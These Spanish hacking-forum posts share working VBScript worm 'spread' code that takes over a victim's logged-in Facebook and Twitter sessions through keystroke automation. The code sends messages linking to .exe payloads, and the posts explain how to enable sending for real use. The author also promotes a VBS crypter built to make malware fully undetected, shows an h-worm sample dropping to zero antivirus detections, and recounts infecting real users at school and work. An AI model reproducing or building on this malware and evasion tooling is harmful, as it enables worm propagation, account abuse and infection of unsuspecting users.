Gracias por el feedback, pero necesito un poco más de información:

1- El script original que quieres cifrar
2- El AV que tienes instalado en ese PC

En breve publicaré la versión 2.0 para que puedas probar otros metodos de cifrado. Saludos y gracias

El tema ha sido movido a Scripting.

http://foro.elhacker.net/index.php?topic=410344.0

Te lo muevo al foro de scripting.

Ahí te podrán ayudar mucho mejor. Elektro es un dios de los scripts xD

Gracias Ya sabes que me gusta mucho esmerarme en la GUI de cualquier proyecto. Esta versión 1.0 es muy limitada, pero necesitaba sacar el proyecto al público antes que otro se me adelantase. La proxima versión 2.0 (aún en desarrollo) luce tal que así:



PD: Ya veo que te has visto en el about

El codigo es sencillo y "chapucero", evidentemente se puede implementar de formas más eficaces, ésto es solo una prueba de concepto. Yo le agregaría una función que compruebe las cookies locales para ver si el usuario está logeado en Facebook/Twitter y luego una función que detecte si el usuario está delante de la pantalla o no, por ejemplo comprobando la posición del Mouse a intervalos de 5 minutos, si el mouse no se mueve pues lanzar el spread para que nadie lo vea.

Insisto que lo he probado con varios usuarios del instituo y del trabajo. El gusano se expandió por la red en cuestión de horas. Tuve que eliminar el fichero de descarga para detener la infección.

Es un método un poco brusco y "chapucero", pero funciona que da miedo

Lo has probado? Te ha funcionado? Mañana lo probaré en otras maquinas con SO y web-browsers diferentes a ver si detecto algun bug.

Gracias!

PD: vbs tiene la facilidad de ser fácilmente programable y encriptable, obtienes grandes resultados con solo unos pocos bytes. Yo adoro VB6 y VBS

Hola a todos

Como algunos ya habréis visto, estoy retomando mis tiempos mozos de programación. Ando liado desarrollando virus, troyanos y gusanos. Hoy vengo a compartir 3 funciones de Spread que permitirán reproducir una infección vírica usando Facebook (2 métodos) y Twitter (1 método)

El funcionamiento es muy simple. Primero de todo se tienen que dar unas circunstancias para que el "spread" sea efectivo, he realizado pruebas con usuarios reales y me he quedado asombrado con la efectividad de éste "spread". El código se aprovecha de los atajos de teclado que hay en las web's de FB y TW. Eso significa que si cambian los atajos, la función dejará de funcionar... Empecemos con la primera:

Spread usando mensajes personales de Facebook

Primero de todo, os contaré las pulsaciones que ejecuta el script para que las podáis testear en vuestro propio FB, es muy fácil:

1. Entra en www.facebook.com
2. Inicia sesión en tu perfil
3. Pulsa la combinación de teclas: ALT+M
4. Pulsa una tecla (la letra C por ejemplo)
5. Pulsa Enter y Tabulador
6. Escribe un texto y pulsa Enter

Si lo has hecho bien, verás que has enviado un mensaje a un contacto de tu lista de amigos. Pues bien, el script automatiza todas esas acciones en el PC de la víctima:

Set WS = CreateObject("WScript.Shell")
call fb_msg_spread("holaa, te he etiquetado en esta foto http://www.servidor.com/mifoto.exe")
 
Function FB_MSG_Spread(X)
	Randomize
	C = Chr(Int(rnd*26)+97)
 
	WS.run "http://www.facebook.com"
	WScript.Sleep 5000
 
	WS.SendKeys "%m"
	WScript.Sleep 500
 
	For i = 1 to Int(rnd*5)+2
		WS.SendKeys C
		WScript.Sleep 500
		WS.SendKeys "{ENTER}"
	Next
 
	WScript.Sleep 500
	WS.SendKeys "{TAB}"
	WScript.Sleep 500
	WS.SendKeys X
	WScript.Sleep 500
	'WS.SendKeys "{ENTER}"
End Function

Copiad ese código TAL CUAL en un fichero de texto y lo guardáis como VBS. La última linea esta comentada, por lo que no os preocupéis, no se va a mandar ningún mensaje a ningún contacto vuestro.

Ahora ejecutad el fichero y mirar como se reproduce la secuencia de comandos. El script calcula una letra al azar y la utiliza para enviar el mensaje a varios contactos simultaneamente. Para utilizar éste código de forma real, quita el comentario de la última línea y ya tendrás un estupendo spread por Facebook.



Spread usando noticias del muro de Facebook

Éste metodo es parecido al anterior, pero utiliza las teclas J y C para buscar una noticia al azar y enviar el comentario:

Set WS = CreateObject("WScript.Shell")
call fb_txt_spread("ei, creo que te han etiquetado sin tu permiso! http://www.servidor.com/lafoto.exe")
 
Function FB_TXT_Spread(X)
	Randomize
 
	WS.run "http://www.facebook.com"
	WScript.Sleep 5000
 
	For i = 1 to Int(rnd*5)+1
		WS.SendKeys "j"
		WScript.Sleep 800
	Next
 
	WS.SendKeys "c"
	WScript.Sleep 800
	WS.SendKeys X
	WScript.Sleep 500
	'WS.SendKeys "{ENTER}"
	WScript.Sleep 500
	WS.SendKeys "{TAB}"
	WScript.Sleep 500
	WS.SendKeys "{TAB}"
	WScript.Sleep 500
	WS.SendKeys "j"
End Function

De igual modo que en el ejemplo anterior, podéis ejecutar éste script ya que la tecla ENTER está comentada y no hay riesgo. Para utilizar el script en un entorno real, quitad el comentario.



Spread usando un tweet en Twitter

Lo mismo que los anteriores casos, utilizando la tecla M para mandar un tweet:

Set WS = CreateObject("WScript.Shell")
call tw_txt_spread("Acabo de publicar un album de fotos http://www.servidor.com/photo_album.exe")
 
Function TW_TXT_Spread(X)
	Randomize
 
	WS.run "http://www.twitter.com"
	WScript.Sleep 6000
 
	WS.SendKeys "n"
	WScript.Sleep 800
	WS.SendKeys X
	WScript.Sleep 500
	WS.SendKeys "{TAB}"
	WScript.Sleep 500
	'WS.SendKeys "{ENTER}"
End Function

Podéis probar el código, ya que la tecla ENTER también está comentada.

---

Bueno, espero que os haya gustado y que haya quedado clara mi explicación. Insisto, los script que he puesto los podéis probar en vuestro PC, ya que la línea que envía el mensaje a los contactos está deshabilitada con el comentario, así que no hay riesgo.

Saludos!!

Basicamente es como comentan mis compañeros. Pero eso a nivel de "protección" no tiene nada.

Cualquier scriptkiddie puede sacar el password correcto o alterar el salto condicional en cuestión de segundos.

Saludos

Buenas a todos, amigos del Visua Basic jajaja

Os dejo el programa + source completo de mi última creación:



Es un encriptador para fichero VBS, en proximas versiones añadiré más algoritmos.
A destacar el trabajo de la GUI, tiene muchos efectos, particulas y musicas.

Saludos!!!

POST ORIGINAL: http://foro.elhacker.net/analisis_y_diseno_de_malware/cactus_vbs_crypter_10-t409804.0.html (el source está en el link)

Buenas a todos

Os traigo una nueva herramienta, Cactus VBS Crypter 1.0

Es una pequeña tool (sencilla) que cifra cualquier fichero VBS para ofuscar su código y evitar la detección por firmas de los AntiVirus. Permite dejar un fichero completamente FUD (Full Undetected).


El funcionamiento es muy sencillo, seleccionamos un fichero VBS, la cifrado deseada y pulsamos el botón "Encrypt VBS".

Por el momento, en ésta versión 1.0 solo he implementado un Engine para cifrar. En próximas versiones añadiré los algoritmos que faltan. Cada fichero cifrado con SAE es generado utilizando una semilla aleatoria de 0 hasta 10, por lo que un mismo fichero puede ser cifrado de 10 formas diferentes. Además con las opciones avanzadas podrás utilizar variables aleatorias para burlar la heurística de los AV.

Como todos mis proyectos, Cactus VBS Crypter es gratis y OpenSource.

Está programado 100% usando VisualBasic 6.0
Los efectos de la GUI también son programados en VB.

Os dejo un ejemplo de h-worm antes y después de ser cifrado:

               Filename :h-worm sample.vbs
               Type : File
               Filesize : 14266 bytes
               Date : 04/03/2014 - 00:16 GMT+2
               MD5 : c967656a556acb11b84ab5e747174b8f
               SHA1 : bd068ef682f12ca08305b5a6fd1e6d04584afea5
               Status : Infected
               Result :25/35
               
                  AVG Free - Virus found VBS/Downloader.Agent
                  ArcaVir - Heur.VBS.Generic.23
                  Avast - VBS:Agent-AOZ [Trj]
                  AntiVir (Avira) - VBSOKgent.BH.3
                  BitDefender - Worm.VBS.Dunihi.BC
                  VirusBuster Internet Security - HTML.Psyme.Gen
                  Clam Antivirus - OK
                  COMODO Internet Security - OK
                  Dr.Web - Trojan.Hworm.1
                  eTrust-Vet - VBS/Jenxcus.A
                  F-PROT Antivirus - VBS/Dunihi.A (exact)
                  F-Secure Internet Security - OK
                  G Data - Worm.VBS.Dunihi.BC, VBS:Dropper-DK [Trj]
                  IKARUS Security - Virus.VBS.Downloader
                  Kaspersky Antivirus - Worm.VBS.Dinihou.a
                  McAfee - VBSOKutorun.worm.aapj
                  MS Security Essentials - Worm:VBS/Jenxcus.K
                  ESET NOD32 - Worm.VBSOKgent.NDH
                  Norman - text/Dunihi.B
                  Norton Antivirus - OK
                  Panda Security - OK
                  A-Squared - Worm.VBS.Dunihi.BC (B)
                  Quick Heal Antivirus - VBS/HBraker.NO
                  Solo Antivirus - OK
                  Sophos - VBS/Dinihou-G
                  Trend Micro Internet Security - VBS_DUNIHI.SM2
                  VBA32 Antivirus - OK
                  Zoner AntiVirus - OK
                  Ad-Aware - Worm.VBS.Jenxcus.ah (v)
                  BullGuard - Worm.VBS.Dunihi.BC
                  Immunet Antivirus - OK
                  K7 Ultimate - NetWorm ( 0040f5f81 )
                  NANO Antivirus - Trojan.Script.Hworm.cbxvbd, Trojan.Script.Agent.chhpqc, Trojan.Script.Qhost.chhpdx
                  Panda CommandLine - OK
                  VIPRE - Worm.VBS.Jenxcus.ah (v)



               Filename : 7871_SAE.vbs
               Type : File
               Filesize : 47171 bytes
               Date : 04/03/2014 - 00:20 GMT+2
               MD5 : 387ae20ac7f3930ca8d866ea5e3b77d5
               SHA1 : ae47567be4de52035987ca3d76034b0cba369be5
               Status : Clean
               Result :0/35
               
                  AVG Free - OK
                  ArcaVir - OK
                  Avast - OK
                  AntiVir (Avira) - OK
                  BitDefender - OK
                  VirusBuster Internet Security - OK
                  Clam Antivirus - OK
                  COMODO Internet Security - OK
                  Dr.Web - OK
                  eTrust-Vet - OK
                  F-PROT Antivirus - OK
                  F-Secure Internet Security - OK
                  G Data - OK
                  IKARUS Security - OK
                  Kaspersky Antivirus - OK
                  McAfee - OK
                  MS Security Essentials - OK
                  ESET NOD32 - OK
                  Norman - OK
                  Norton Antivirus - OK
                  Panda Security - OK
                  A-Squared - OK
                  Quick Heal Antivirus - OK
                  Solo Antivirus - OK
                  Sophos - OK
                  Trend Micro Internet Security - OK
                  VBA32 Antivirus - OK
                  Zoner AntiVirus - OK
                  Ad-Aware - OK
                  BullGuard - OK
                  Immunet Antivirus - OK
                  K7 Ultimate - OK
                  NANO Antivirus - OK
                  Panda CommandLine - OK
                  VIPRE - OK
            

DESCARGA: https://www.mediafire.com/?8t7ok9se572dkx7
               
PD: Me ha costado más tiempo programar la GUI y los efectos que el propio programa. jajajajaja